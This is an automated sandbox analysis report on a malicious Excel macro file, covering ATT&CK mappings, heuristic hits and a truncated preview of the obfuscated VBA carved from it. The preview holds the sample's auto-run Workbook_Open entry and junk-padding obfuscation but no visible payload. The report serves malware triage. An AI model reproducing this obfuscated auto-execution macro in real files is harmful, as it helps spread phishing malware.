MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The OOXML file contains a Workbook_Open macro, a common technique for executing malicious VBA code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an attempt to download and execute a second-stage payload. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 17912 bytes |
SHA-256: 650809d191393e911a70eecaa8d9054b90e89a4a864f739fc8177279e69aacd3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
MwUdGhjV7Hl4.CfWYp5j55jJHPwNGUUSr
While 6 = 719
Dim i3wKUElOGVkb3UtGBjJEaPnvyQr9W64AXJ5Is As Variant
Wend
Dim KCiRSwg8rO4C As Integer
While 24 = 6780
Dim EEuJLOQN_UDVl1JajDqYjWyfjwGcExFBx6PyGzJ As Variant
Wend
Dim m5sz9KoakEVn As Integer
While 17 = 7171
Dim hcarPNiXGxGJMBhpjTRs2vvon9fWFo1_ZbbSchh3Ouvxvgk7m81Pvmu As Variant
Wend
Dim vqvCPqKPb6FsuhN As Integer
While 27 = 7191
Dim LAuXbE_72EWitHwjMwpplpeQKDdR2nwyWWuy As Variant
Wend
Dim dVIous473FaGnT As Integer
While 18 = 4292
Dim leecLXkp_LQgJVV7Ezl_42vgXDlUmfu1tftNSAHuD_ As Variant
Wend
Dim mqnU6_upNCSD7s As Integer
While 28 = 3421
Dim s7_GvOBgaZvnkFmDpz6yND2BGgj7Pqfoi_eU6A9wB_NM As Variant
Wend
Dim hPbmCJUbFFdnDB As Integer
While 25 = 1755
Dim Mo_Os3E_jkPFo1GwHynczD64EUDhaezP As Variant
Wend
Dim AtG6xeTbK2Bu As Integer
While 25 = 5404
Dim Cpj9STyYgHIrJIVxglDt_LnF_zTRSAnK4GCobiG As Variant
Wend
Dim IA1U2iYunHe4 As Integer
While 28 = 9569
Dim hwPuzAc8b_fEfc8xBFqU8d4sH1vfi_oIwEEWl As Variant
Wend
Dim VLm8joIdtxWkk As Integer
While 28 = 7821
Dim rgZH5D3gl8N7XWSUQZWiJn4CVWxsMWBW48UGrmI As Variant
Wend
Dim AdDtMWAKPy As Integer
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "MwUdGhjV7Hl4"
Dim AEiYjAE1VSv_DurgYbyzM9xJOAUdwgIDYqZvyVCKMOe5JUW9834cAdBAQXH As String
Function GaW_AYDlWvgNHRM61BYBKmmOVDE4onUKg4E6mW2gPdT1luUtePf8uNlcw(ziY8uTLJMi9ch3ORN47ixFMvtmleBpip_ByVwj_vzuBEdmXJwPlUDGyrTlMGqpGg9RWfC2em3JsC_GQFNaquDMk6KFBJU2DHldFKN2F5u9a3XvmLTF2O8VbtpZS6zTP)
While 17 = 8749
Dim o_mygS4oK7M1eDOCVttfGnFAPZGUr2XGhAriy8XLMU5SMTi As Variant
Wend
Dim QjVudzjc_2 As Integer
While 12 = 4389
Dim lgEJg6SgERdUoMXTfQurvw5zzuTF4P7gqpKYQAoYkvFB_55GUHRQqQExlOT As Variant
Wend
Dim vjKmyT6m8B8BelT As Integer
While 14 = 6473
Dim F_p3t4yLut8oyXjVvBo2yYGQpHQ6EVFwoVJ_GsdZ6WZ21oFNVnJ9y As Variant
Wend
Dim sep1WKkl3EWmI9a As Integer
Dim rdIENZmhCOdaTfmZN2NcdbAbOzW1tNywI_6Z4YJIztDFJXMoPFp8EUXNcpzWCvxwZqQOjLfxqDmtW4P1lqimh1qwpp7LivFC6PocF8_Dj1PArm
While 4 = 2990
Dim MdNCgN5a8NZ_AChaJF851cLtf2xCPCNpon_1YGaiwCqk7KiiSnKeKDjt As Variant
Wend
Dim PdenZ2I5_sSV As Integer
While 22 = 1752
Dim BpBCnWGwukvTRNsl1rdkDOj5kvH53vkM1LflkG As Variant
Wend
Dim x5v8oqJUJGfDPNq As Integer
While 11 = 6275
Dim RvEFZ2MK399gc_qF_r1opPP4LZY8wUqS9H4te As Variant
Wend
Dim dp8js38pHqP As Integer
Dim USTS4Ye_qHJysR4SMnCZ3M6mbTKjeuRz9yjXIFYkvSJpG_9n6DfYkdSFVpziL5h5zTz4
While 22 = 2165
Dim cAeUYhABdK3_aOXgQnhSJ7jeA2_6WRMC As Variant
Wend
Dim sHdvyT4YG2 As Integer
While 8 = 3718
Dim ORjpfTTTpAiV_eY_SfbDmJ8zPQtlq6sHKRqQ4TUtkBkKbUD8Uy_W7CMDTtX As Variant
Wend
Dim MiqmsPZJvxGE As Integer
While 6 = 6155
Dim IqbkivV5MvO25UJH_l6H5FJ3W24AJPIMsALNikdhWc9vau As Variant
Wend
Dim x5OApJJ6CC As Integer
While 2 = 5091
Dim fhLp1Ts7lAH4G5hbGWuaGWalD9uHi8Cv7IrAWwpBsBIYk3vSbMBvJk4G As Variant
Wend
Dim Eil1ijVm8U As Integer
While 26 = 8134
Dim Lg_Tprq_LB_IK
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 51200 bytes |
SHA-256: 6ad19b581d59deca15ef5dab2c0d6f437a3c4cb08619763ee1cd0b2efa9f57e4 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.